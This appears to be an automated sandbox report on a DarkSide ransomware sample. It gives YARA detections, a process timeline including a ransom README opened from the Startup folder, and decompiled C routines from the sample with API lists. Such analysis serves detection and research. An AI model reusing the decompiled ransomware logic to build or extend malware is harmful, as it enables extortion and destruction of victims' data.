• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.349425661.0000000002AA7000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.321323465.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.311791138.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.337762957.0000000002B07000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409162945.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.434752909.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.302198707.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.415423650.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.410205898.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.473912941.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.479859917.0000000002E18000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.439469384.0000000002E08000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.295417556.0000000002AA0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.456833891.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.294724805.0000000002AA0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.480034130.0000000002D50000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.429089053.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.298539675.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409597850.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.431347630.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409312887.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.441657546.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.430481720.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.415984076.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.458381849.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.415652999.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.336753706.0000000002B07000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408806702.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.281911971.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
Reputation:low

General

Start time:06:16:36
Start date:12/05/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff641cd0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:16:46
Start date:12/05/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:0x7ff641cd0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:16:48
Start date:12/05/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:0x7ff641cd0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:16:48
Start date:12/05/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:0x7ff641cd0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:16:50
Start date:12/05/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:0x7ff641cd0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:16:50
Start date:12/05/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:0x7ff641cd0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:16:51
Start date:12/05/2021
Path:C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\SgrmBroker.exe
Imagebase:0x7ff780c50000
File size:163336 bytes
MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:16:52
Start date:12/05/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:0x7ff641cd0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:17:01
Start date:12/05/2021
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff641cd0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:06:17:53
Start date:12/05/2021
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:0x7ff7ab9a0000
File size:455656 bytes
MD5 hash:A267555174BFA53844371226F482B86B
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

                                                                                      General

                                                                                      Start time:06:17:55
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff774ee0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:06:18:14
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\notepad.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT
                                                                                      Imagebase:0x7ff6a7f60000
                                                                                      File size:245760 bytes
                                                                                      MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, Author: Joe Security

Disassembly

Code Analysis

Executed Functions

C-Code - Quality: 100%
E0040911D(void* __fp0) {
	void* _v8;
	int _v12;
	WCHAR* _v16;
	void* _t29;
	void* _t34;
	void* _t35;
	void* _t36;
	void* _t37;
	long _t38;
	void* _t48;
	void* _t49;
	void* _t54;
	intOrPtr* _t56;
	void* _t57;
	void* _t62;
	void* _t63;
	intOrPtr* _t65;
	intOrPtr* _t66;
	void* _t68;
	void* _t69;
	void* _t72;

	_t72 = __fp0;
	_t29 = E004018D1(); // executed
	E00402A44(_t29); // executed
	if( *0x40f595 == 0) {
		L3:
		E00401E1B(".2c9ccbf3"); // executed
		_t69 = CommandLineToArgvW( *0x40f5e2,  &_v12);
		__eflags = _t69;
		if(_t69 == 0) {
			L12:
			_t34 = E00401EAE();
			__eflags = _t34;
			if(_t34 != 0) {
				L16:
				_t35 = E00401EBC(); // executed
				__eflags = _t35;
				if(_t35 != 0) {
					 *0x40f5ea = E004022A9();
					E0040318A();
				}
				__eflags =  *0x40f592;
				if( *0x40f592 != 0) {
					 *0x40f5e6 = E0040221B();
				}
				__eflags = _v12 - 3;
				if(_v12 != 3) {
					__eflags = _v12 - 2;
					if(_v12 != 2) {
						goto L32;
					} else {
						_t54 = E00408BD6( *((intOrPtr*)(_t69 + 4)));
						__eflags =  *0x40f5e6;
						if( *0x40f5e6 != 0) {
							return NtClose( *0x40f5e6);
						}
						return _t54; // executed
					}
				} else {
					_t56 =  *((intOrPtr*)(_t69 + 4));
					__eflags =  *_t56 - 0x70002d;
					if( *_t56 != 0x70002d) {
						L27:
						L32:
						_t36 = E00401EBC(); // executed
						__eflags = _t36;
						if(_t36 == 0) {
							_t37 = E00401EAE();
							__eflags = _t37;
							if(_t37 == 0) {
								goto L38;
							} else {
								E00402742(".2c9ccbf3"); // executed
								_t48 = E004026A6(".2c9ccbf3"); // executed
								return _t48;
							}
						} else {
							_t49 = E00402627(".2c9ccbf3");
							__eflags = _t49;
							if(_t49 == 0) {
								 *0x40f5ea = E004022A9();
								E0040318A();
								L38:
								__eflags = _t69;
								if(_t69 != 0) {
									RtlFreeHeap( *0x40f5d6, 0, _t69);
								}
								__eflags =  *0x40f5a3;
								if( *0x40f5a3 == 0) {
									L44:
									_t38 = E00409042(_t72);
									__eflags =  *0x40f5a3;
									if( *0x40f5a3 != 0) {
										__eflags = _v8;
										if(_v8 != 0) {
											ReleaseMutex(_v8);
											_t38 = NtClose(_v8);
										}
									}
									__eflags =  *0x40f5e6;
									if( *0x40f5e6 != 0) {
										_t38 = NtClose( *0x40f5e6);
									}
									__eflags =  *0x40f5ea;
									if( *0x40f5ea != 0) {
										_t38 = NtClose( *0x40f5ea);
									}
									__eflags =  *0x40f598;
									if( *0x40f598 != 0) {
										return E00403D8F();
									}
									return _t38;
								} else {
									_v16 = E00403CF8();
									_v8 = OpenMutexW(0x100000, 0, _v16);
									__eflags = _v8;
									if(_v8 == 0) {
										_v8 = CreateMutexW(0, 1, _v16);
										E00401A1A( *0x40f5d6, 0, _v16);
										goto L44;
									} else {
										return NtClose(_v8);
									}
								}
							} else {
								E00402A1F(".2c9ccbf3");
								return E00402742(".2c9ccbf3");
							}
						}
					} else {
						__eflags =  *((intOrPtr*)(_t56 + 4)) - 0x740061;
						if( *((intOrPtr*)(_t56 + 4)) != 0x740061) {
							goto L27;
						} else {
							__eflags =  *((intOrPtr*)(_t56 + 8)) - 0x68;
							if( *((intOrPtr*)(_t56 + 8)) != 0x68) {
								goto L27;
							} else {
								_t57 = E00408BD6( *((intOrPtr*)(_t69 + 8)));
								__eflags =  *0x40f5e6;
								if( *0x40f5e6 != 0) {
									return NtClose( *0x40f5e6);
								}
								return _t57;
							}
						}
					}
				}
			} else {
				_t62 = E004016D2();
				__eflags = _t62 - 0x3c;
				if(_t62 <= 0x3c) {
					goto L16;
				} else {
					_t63 = E004020A3();
					__eflags = _t63;
					if(_t63 == 0) {
						goto L16;
					} else {
						return E00402581(); // executed
					}
				}
			}
		} else {
			__eflags = _v12 - 5;
			if(_v12 != 5) {
				goto L12;
			} else {
				_t65 =  *((intOrPtr*)(_t69 + 4));
				__eflags =  *_t65 - 0x77002d;
				if( *_t65 != 0x77002d) {
					goto L12;
				} else {
					__eflags =  *((intOrPtr*)(_t65 + 4)) - 0x72006f;
					if( *((intOrPtr*)(_t65 + 4)) != 0x72006f) {
						goto L12;
					} else {
						__eflags =  *((intOrPtr*)(_t65 + 8)) - 0x6b;
						if( *((intOrPtr*)(_t65 + 8)) != 0x6b) {
							goto L12;
						} else {
							_t66 =  *((intOrPtr*)(_t69 + 0xc));
							__eflags =  *_t66 - 0x70002d;
							if( *_t66 != 0x70002d) {
								goto L12;
							} else {
								__eflags =  *((intOrPtr*)(_t66 + 4)) - 0x740061;
								if( *((intOrPtr*)(_t66 + 4)) != 0x740061) {
									goto L12;
								} else {
									__eflags =  *((intOrPtr*)(_t66 + 8)) - 0x68;
									if(__eflags != 0) {
										goto L12;
									} else {
										return E00408F5B(__eflags,  *((intOrPtr*)(_t69 + 8)),  *((intOrPtr*)(_t69 + 0x10)));
									}
								}
							}
						}
					}
				}
			}
		}
	} else {
		_t68 = E00402E44();
		if(_t68 == 0) {
			goto L3;
		} else {
			return _t68;
		}
	}
}

Statement addresses (address column of the decompiler view, listed in the order it appeared; 0x00000000 marks lines without a mapped address):

0x0040911d 0x00409123 0x00409128 0x00409134 0x00409143 0x00409148 0x0040915d 0x0040915f
0x00409161 0x004091ac 0x004091ac 0x004091b1 0x004091b3 0x004091d1 0x004091d1 0x004091d6
0x004091d8 0x004091df 0x004091e4 0x004091e4 0x004091e9 0x004091f0 0x004091f7 0x004091f7
0x004091fc 0x00409200 0x0040923f 0x00409243 0x00000000 0x00409245 0x00409248 0x0040924d
0x00409254 0x00000000 0x0040925c 0x00409265 0x00409265 0x00409202 0x00409202 0x00409205
0x0040920b 0x0040923d 0x00409266 0x00409266 0x0040926b 0x0040926d 0x004092a6 0x004092ab
0x004092ad 0x00000000
                                                                                        0x004092af
                                                                                        0x004092b4
                                                                                        0x004092be
                                                                                        0x004092c6
                                                                                        0x004092c6
                                                                                        0x0040926f
                                                                                        0x00409274
                                                                                        0x00409279
                                                                                        0x0040927b
                                                                                        0x0040929a
                                                                                        0x0040929f
                                                                                        0x004092c7
                                                                                        0x004092c7
                                                                                        0x004092c9
                                                                                        0x004092d4
                                                                                        0x004092d4
                                                                                        0x004092da
                                                                                        0x004092e1
                                                                                        0x00409331
                                                                                        0x00409331
                                                                                        0x00409336
                                                                                        0x0040933d
                                                                                        0x0040933f
                                                                                        0x00409343
                                                                                        0x00409348
                                                                                        0x00409351
                                                                                        0x00409351
                                                                                        0x00409343
                                                                                        0x00409357
                                                                                        0x0040935e
                                                                                        0x00409366
                                                                                        0x00409366
                                                                                        0x0040936c
                                                                                        0x00409373
                                                                                        0x0040937b
                                                                                        0x0040937b
                                                                                        0x00409381
                                                                                        0x00409388
                                                                                        0x00000000
                                                                                        0x0040938a
                                                                                        0x00409392
                                                                                        0x004092e3
                                                                                        0x004092e8
                                                                                        0x004092fb
                                                                                        0x004092fe
                                                                                        0x00409302
                                                                                        0x0040931e
                                                                                        0x0040932c
                                                                                        0x00000000
                                                                                        0x00409304
                                                                                        0x00409310
                                                                                        0x00409310
                                                                                        0x00409302
                                                                                        0x0040927d
                                                                                        0x00409282
                                                                                        0x00409294
                                                                                        0x00409294
                                                                                        0x0040927b
                                                                                        0x0040920d
                                                                                        0x0040920d
                                                                                        0x00409214
                                                                                        0x00000000
                                                                                        0x00409216
                                                                                        0x00409216
                                                                                        0x0040921a
                                                                                        0x00000000
                                                                                        0x0040921c
                                                                                        0x0040921f
                                                                                        0x00409224
                                                                                        0x0040922b
                                                                                        0x00000000
                                                                                        0x00409233
                                                                                        0x0040923c
                                                                                        0x0040923c
                                                                                        0x0040921a
                                                                                        0x00409214
                                                                                        0x0040920b
                                                                                        0x004091b5
                                                                                        0x004091b5
                                                                                        0x004091ba
                                                                                        0x004091bd
                                                                                        0x00000000
                                                                                        0x004091bf
                                                                                        0x004091bf
                                                                                        0x004091c4
                                                                                        0x004091c6
                                                                                        0x00000000
                                                                                        0x004091c8
                                                                                        0x004091d0
                                                                                        0x004091d0
                                                                                        0x004091c6
                                                                                        0x004091bd
                                                                                        0x00409163
                                                                                        0x00409163
                                                                                        0x00409167
                                                                                        0x00000000
                                                                                        0x00409169
                                                                                        0x00409169
                                                                                        0x0040916c
                                                                                        0x00409172
                                                                                        0x00000000
                                                                                        0x00409174
                                                                                        0x00409174
                                                                                        0x0040917b
                                                                                        0x00000000
                                                                                        0x0040917d
                                                                                        0x0040917d
                                                                                        0x00409181
                                                                                        0x00000000
                                                                                        0x00409183
                                                                                        0x00409183
                                                                                        0x00409186
                                                                                        0x0040918c
                                                                                        0x00000000
                                                                                        0x0040918e
                                                                                        0x0040918e
                                                                                        0x00409195
                                                                                        0x00000000
                                                                                        0x00409197
                                                                                        0x00409197
                                                                                        0x0040919b
                                                                                        0x00000000
                                                                                        0x0040919d
                                                                                        0x004091ab
                                                                                        0x004091ab
                                                                                        0x0040919b
                                                                                        0x00409195
                                                                                        0x0040918c
                                                                                        0x00409181
                                                                                        0x0040917b
                                                                                        0x00409172
                                                                                        0x00409167
                                                                                        0x00409136
                                                                                        0x00409136
                                                                                        0x0040913d
                                                                                        0x00000000
                                                                                        0x00409142
                                                                                        0x00409142
                                                                                        0x00409142
                                                                                        0x0040913d

                                                                                        APIs
                                                                                          • Part of subcall function 00402A44: RtlAllocateHeap.NTDLL(00000008,?), ref: 00402A69
                                                                                          • Part of subcall function 00402A44: memcpy.NTDLL(00000000,00410030,?,?,?,?,?,?,00000000), ref: 00402A88
                                                                                          • Part of subcall function 00402A44: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00402AAD
                                                                                          • Part of subcall function 00402A44: memcpy.NTDLL(0040F470,00000000,00000100,00000000,00000000,?,?,00000000), ref: 00402AE2
                                                                                          • Part of subcall function 00402A44: memcpy.NTDLL(0601ac206b9e361,00000000,00000020), ref: 00402AFB
                                                                                          • Part of subcall function 00402A44: memcpy.NTDLL(0040F590,?,00000016), ref: 00402B0F
                                                                                          • Part of subcall function 00402A44: strlen.NTDLL ref: 00402B25
                                                                                          • Part of subcall function 00402A44: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402B37
                                                                                          • Part of subcall function 00402A44: strlen.NTDLL ref: 00402B62
                                                                                          • Part of subcall function 00402A44: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402B74
                                                                                        • CommandLineToArgvW.SHELL32(?,.2c9ccbf3), ref: 00409157
                                                                                          • Part of subcall function 00402E44: NtQueryInstallUILanguage.NTDLL(?), ref: 00402E53
                                                                                          • Part of subcall function 00402E44: NtQueryDefaultUILanguage.NTDLL(?), ref: 00402E60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: AllocateHeapmemcpy$LanguageQuerystrlen$ArgvCommandDefaultInstallLine
                                                                                        • String ID: .2c9ccbf3
                                                                                        • API String ID: 971990139-3269262987
                                                                                        • Opcode ID: 4c89be0c7d23382072414fccc67b5b002bd0ec496e2fabd26ee87c507b17e861
                                                                                        • Instruction ID: 2464313ce2134e79abafbdac667b0b17a2fc402787c8f680ac349fb58c25edf5
                                                                                        • Opcode Fuzzy Hash: 4c89be0c7d23382072414fccc67b5b002bd0ec496e2fabd26ee87c507b17e861
                                                                                        • Instruction Fuzzy Hash: 7F517E30A04205FAEF31AFA1EE4A72A3764AB01305F0445BBE804765E3DB7D4D98CA5E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 18%
                                                                                        			E00401EBC() {
                                                                                        				void* _v8;
                                                                                        				union _SID_NAME_USE _v12;
                                                                                        				long _v16;
                                                                                        				long _v20;
                                                                                        				short _v148;
                                                                                        				short _v276;
                                                                                        				char _v280;
                                                                                        				void* _v324;
                                                                                        				void* _t23;
                                                                                        				int _t30;
                                                                                        				union _SID_NAME_USE _t43;
                                                                                        				void* _t44;
                                                                                        				void* _t45;
                                                                                        
                                                                                        				_t43 = 0;
                                                                                        				_push( &_v8);
                                                                                        				_push(8);
                                                                                        				_push(0xffffffff);
                                                                                        				if( *0x40f6e4() != 0) {
                                                                                        					L11:
                                                                                        					return _t43;
                                                                                        				}
                                                                                        				_t23 =  *0x40f6d0(_v8, 1,  &_v324, 0x2c,  &_v280); // executed
                                                                                        				if(_t23 == 0) {
                                                                                        					_v16 = 0x80;
                                                                                        					_v20 = 0x80;
                                                                                        					_v12 = 1;
                                                                                        					_t30 = LookupAccountSidW(0, _v324,  &_v148,  &_v16,  &_v276,  &_v20,  &_v12); // executed
                                                                                        					if(_t30 != 0) {
                                                                                        						_t44 = E00401D08(0x40ced3);
                                                                                        						_push(_t44);
                                                                                        						_push( &_v276);
                                                                                        						if( *0x40f694() != 0) {
                                                                                        							RtlFreeHeap( *0x40f5d6, 0, _t44);
                                                                                        							_t45 = E00401D08(0x40cef1);
                                                                                        							_push(_t45);
                                                                                        							_push( &_v276);
                                                                                        							if( *0x40f694() != 0) {
                                                                                        								RtlFreeHeap( *0x40f5d6, 0, _t45);
                                                                                        								_t45 = E00401D08(0x40cf0d);
                                                                                        								_push(_t45);
                                                                                        								_push( &_v276);
                                                                                        								if( *0x40f694() == 0) {
                                                                                        									_t43 = 1;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t43 = 1;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t43 = 1;
                                                                                        						}
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _t45);
                                                                                        					}
                                                                                        				}
                                                                                        				NtClose(_v8);
                                                                                        				goto L11;
                                                                                        			}


                                                                                        APIs
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000008,004091D6), ref: 00401ED4
                                                                                        • NtQueryInformationToken.NTDLL(004091D6,00000001,?,0000002C,?), ref: 00401EF7
                                                                                        • LookupAccountSidW.ADVAPI32(00000000,?,?,00000080,?,00000080,00000001), ref: 00401F3E
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • _wcsicmp.NTDLL ref: 00401F60
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401F7D
                                                                                        • _wcsicmp.NTDLL ref: 00401F97
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401FE9
                                                                                        • NtClose.NTDLL(004091D6), ref: 00401FF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeToken_wcsicmp$AccountAllocateCloseInformationLookupOpenProcessQuery
                                                                                        • String ID:
                                                                                        • API String ID: 3537576846-0
                                                                                        • Opcode ID: 2f7107606f10ce4e0a6ce4424f8ce297c7b17faf710ce58333f77acaffb5f7b9
                                                                                        • Instruction ID: f234118d78b3bf0a47ad00bc353cdcd6720114ff09e636ee104b725ace2803bf
                                                                                        • Opcode Fuzzy Hash: 2f7107606f10ce4e0a6ce4424f8ce297c7b17faf710ce58333f77acaffb5f7b9
                                                                                        • Instruction Fuzzy Hash: 4A31A672900108BBEB218B91ED45FEA777CFB44701F10017AF604F21A0EB755A498B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00401D45(void* _a4) {
                                                                                        				void* _v8;
                                                                                        				int _v12;
                                                                                        				int _v16;
                                                                                        				int _v20;
                                                                                        				void _v148;
                                                                                        				long _t19;
                                                                                        				long _t26;
                                                                                        				void* _t30;
                                                                                        				void* _t31;
                                                                                        
                                                                                        				_v16 = 0;
                                                                                        				_t31 = E00401D08(0x40ce73);
                                                                                        				if(_t31 != 0) {
                                                                                        					_t19 = RegCreateKeyExW(0x80000002, _t31, 0, 0, 0, 0x20119, 0,  &_v8,  &_v20); // executed
                                                                                        					if(_t19 == 0) {
                                                                                        						_t30 = E00401D08(0x40ceb7);
                                                                                        						if(_t30 != 0) {
                                                                                        							_v12 = 1;
                                                                                        							_v16 = 0x80;
                                                                                        							_t26 = RegQueryValueExW(_v8, _t30, 0,  &_v12,  &_v148,  &_v16); // executed
                                                                                        							if(_t26 == 0) {
                                                                                        								memcpy(_a4,  &_v148, _v16);
                                                                                        							}
                                                                                        							RtlFreeHeap( *0x40f5d6, 0, _t30);
                                                                                        						}
                                                                                        						NtClose(_v8); // executed
                                                                                        					}
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _t31);
                                                                                        				}
                                                                                        				return _v16;
                                                                                        			}


                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RegCreateKeyExW.KERNELBASE(80000002,00000000,00000000,00000000,00000000,00020119,00000000,?,?,0040CE73,?,?), ref: 00401D89
                                                                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,?,00000080,0040CEB7), ref: 00401DC6
                                                                                        • memcpy.NTDLL(00000001,?,00000080), ref: 00401DDD
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401DEF
                                                                                        • NtClose.NTDLL(?), ref: 00401DF8
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401E07
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateCloseCreateQueryValuememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2067435447-0
                                                                                        • Opcode ID: 8db4ddf0c99b9a79d8ee28e3f85468b48a9c35857356776fac1d7eb3c94bc1fa
                                                                                        • Instruction ID: 2199f7403c65914bd568681eddc08d076722dc9d6a7007461f6a1e5a918e7e9e
                                                                                        • Opcode Fuzzy Hash: 8db4ddf0c99b9a79d8ee28e3f85468b48a9c35857356776fac1d7eb3c94bc1fa
                                                                                        • Instruction Fuzzy Hash: 91214F32900218BBD7219F91ED46FAEBB7CEF40704F10407AF504B51A1D7756A189B68
                                                                                        Uniqueness

